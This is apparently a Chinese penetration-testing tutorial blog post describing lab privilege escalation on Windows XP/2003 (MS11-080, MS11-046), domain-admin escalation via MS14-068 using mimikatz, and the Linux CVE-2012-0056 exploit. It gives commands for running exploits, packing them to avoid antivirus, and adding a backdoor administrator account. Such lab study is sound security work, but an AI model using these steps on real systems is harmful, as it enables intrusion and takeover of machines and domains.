利用漏洞提权实例

前提:已渗透进一个XP或2003系统

一、实验目标漏洞:Ms11-080

补丁:Kb2592799

漏洞信息:https://technet.microsoft.com/library/security/ms11-080

1、通过searchsploit命令查找漏洞 【注:查找漏洞的命令行窗口要能完全显示Title和Path】

#有python和ruby两种漏洞利用代码,可根据自己喜好选择,本章选择python

2、通过Sandi查找

查看漏洞利用代码的描述

#通过Afd.sys文件进行提权

###使用32位系统,XP和2003,Eng:表示适用于英文版操作系统,可能在中文上不适用

将18176.py拷贝到XP系统中【注:XP需安装python环境】

中文版XP测试

可能出现蓝屏,无法实现提权!

1、使用英文版XP进行本次实验

2、通过修改代码,使其支持中文版

#1.若系统补丁已安装,先卸载,再进行操作

#2.若系统没有自己需要的编译环境,可先把代码编译成exe执行程序

如何python脚本编译成exe执行程序?

1、下载Pyinstaller【https://pypi.python.org/pypi/PyInstaller/2.1】【功能:将其他python脚本转换为exe】

2、下载Pywin32【http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/

先安装pywin32,再将解压的pyinstaller放到python27中,将18176.py放到pyinstaller文件中,命令行模式下运行

#..\python.exe   指定系统路径

#--onefile   把库文件集成到生成的exe文件

为防止在上传到其他系统时,被杀毒软件拦截,先进行压缩

普通用户无法在C盘写入,解压到临时文件temp

提权成功,创建属于自己的管理员账号,或者提升自己为管理员权限

例如:#net user b b /add                           #net localgroup Administrators a /add

二、实验目标漏洞:MS11-046

实现DOS【蓝屏、重启】

三、Ms14-068【可将域中一台主机的普通用户提升到域管理员权限】

在企业环境中域环境管理电脑,可通过拿到域控制管理员账号权限,可控制整个域环境的电脑,甚至能控制到其他资源【如:财务系统】##微软在域方面的安全问题比较少

搭建域【域:http://www.cnblogs.com/suizhikuo/articles/2117831.html

必须使用server版操作系统作为域控制管理【如:2003】

http://www.poluoluo.com/server/200809/46996.html

##需使用静态ip地址,并且自己作为自己的DNS服务器

分配域账号密码给个人,限制可操作资源

Kali集成漏洞脚本

##生成票据文件

ms14-068.py -u user@lab.com -s userSID -d dc.lab.com

TGT:域环境的身份验证文件

#发起会话请求,获取票据

python 35474.py -u u1@lab.com -s S-1-5-21-1174131619-510335615-37023860181-1107 -d 192.168.1.145

#域里面的SID    -d 指定域控制器名称/IP【除非kali也指定同一个DNS,否则需要写入IP地址】

登录本机,将票据文件拷贝到XP

命令行下提权

mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit

【若出现异常,可尝试重启解决】

###在客户端XP系统,不能成功,需在Win7上进行

使用mimikatz

##kali中若提示出现缺少库文件

可到此网站下载https://github.com/bidord/pykek

在linux平台上,利用漏洞提权

CVE-2012-0056【http://cve.scap.org.cn/CVE-2012-0056.html

/proc/pid/mem   #proc目录为系统启动过程中生成的临时目录,储存大量的内存目录

内核版本高于2.6.39的linux都存在该漏洞【最新的内核版本已修复】

原理:【https://git.zx2c4.com/CVE-2012-0056/about/

靶机:Ubuntu11.10【旧版ubuntu(已停止更新):http://old-releases.ubuntu.com/releases/11.10/

拷贝18411.c 到ubuntu系统

scp /usr/share/exploitdb/platforms/linux/local/18411.c admin@192.168.1.145:/home/admin/

授权chmod、运行./exp

##ubuntu早期版本中,不集成gcc命令,需手动更新

sudo apt-cdrom add && sudo apt-get install gcc

##当更新源找不到包,可用安装光盘作为更新源【光盘自带有各种包,但版本不一定是最新】

选择ISO文件,通过mount命令,挂载到mnt目录或media目录【sudo mount /dev/cdrom /media/cdrom】然后指定更新源【sudo apt-cdrom add】

小白日记24:kali渗透测试之提权(四)--利用漏洞提权的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. kali渗透综合靶机(十四)--g0rmint靶机

    kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...

  3. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  4. 小白日记25:kali渗透测试之提权(五)--利用配置不当提权

    利用配置不当提权 与漏洞提权相比,更常见的方法.在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵.当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行 ...

  5. 小白日记22:kali渗透测试之提权(二)--抓包嗅探

    抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议, ...

  6. 小白日记7:kali渗透测试之主动信息收集-发现(一)--二层发现:arping/shell脚本,Netdiscover,scapy

    主动信息收集 被动信息收集可能不准确,可以用主动信息收集验证   特点:直接与目标系统交互通信,无法避免留下访问痕迹 解决方法:1.使用受控的第三方电脑进行探测,使用代理 (做好被封杀的准备)   2 ...

  7. 小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0

    Linux系统下穿越火线-缓冲区溢出 原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞. 工具: 调试工具:edb: ###python在漏洞溢出方面的渗透测 ...

  8. 小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧 ...

  9. 小白日记13:kali渗透测试之服务扫描(三)-SMTB扫描、防火墙识别、负载均衡识别、WAF识别

    SMTP扫描 SMTP(Simple Mail Transfer Protocol)即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则,由它来控制信件的中转方式.SMTP协议属于TCP/ ...

随机推荐

  1. oracleasm方式创建ASM

    1.准备oracleasm包 [root@localhost oracle]# uname -r 2.6.18-164.el5 [oracle@localhost ~]$ ls -l total 26 ...

  2. webpack入门级教程

    Webpack是什么 首先可以看下官方文档,文档是最好的老师. 这里也有国外的一个朋友写的入门介绍. Webpack是由Tobias Koppers开发的一个开源前端模块构建工具.它的基本功能是将以模 ...

  3. 恒天云单节点部署指南--OpenStack H版本虚拟机单节点部署解决方案

    本帖是openstack单节点在虚拟机上部署的实践.想要玩玩和学习openstack的小伙伴都看过来,尤其是那些部署openstack失败的小伙伴.本帖可以让你先领略一下openstack的魅力.本I ...

  4. 《Java数据结构与算法》笔记-CH1

    /** * 数据结构的特性 ************************************************************************************** ...

  5. j2ee指导型框架或示例

    springside appfuse springfuse

  6. openstack 网络

    物理节点hosts解析配置

  7. HDU 5768 Lucky7 (中国剩余定理 + 容斥 + 快速乘法)

    Lucky7 题目链接: http://acm.hdu.edu.cn/showproblem.php?pid=5768 Description When ?? was born, seven crow ...

  8. Beginning OpenGL ES 2.0 with GLKit Part 1

    Update 10/24/12: If you’d like a new version of this tutorial fully updated for iOS 6 and Xcode 4.5, ...

  9. hdu 5363 Key Set

    http://acm.hdu.edu.cn/showproblem.php?pid=5363 Key Set Time Limit: 2000/1000 MS (Java/Others)    Mem ...

  10. [iOS基础控件 - 6.10.6] UIApplicationDelegate & 程序启动过程

    A.概念 1.移动app非常容易受到其他的系统.软件事件的干扰,如来电.锁屏 2.app受到干扰的时候,UIApplication会通知delegate,来代理处理干扰事件 3.delegate可以处 ...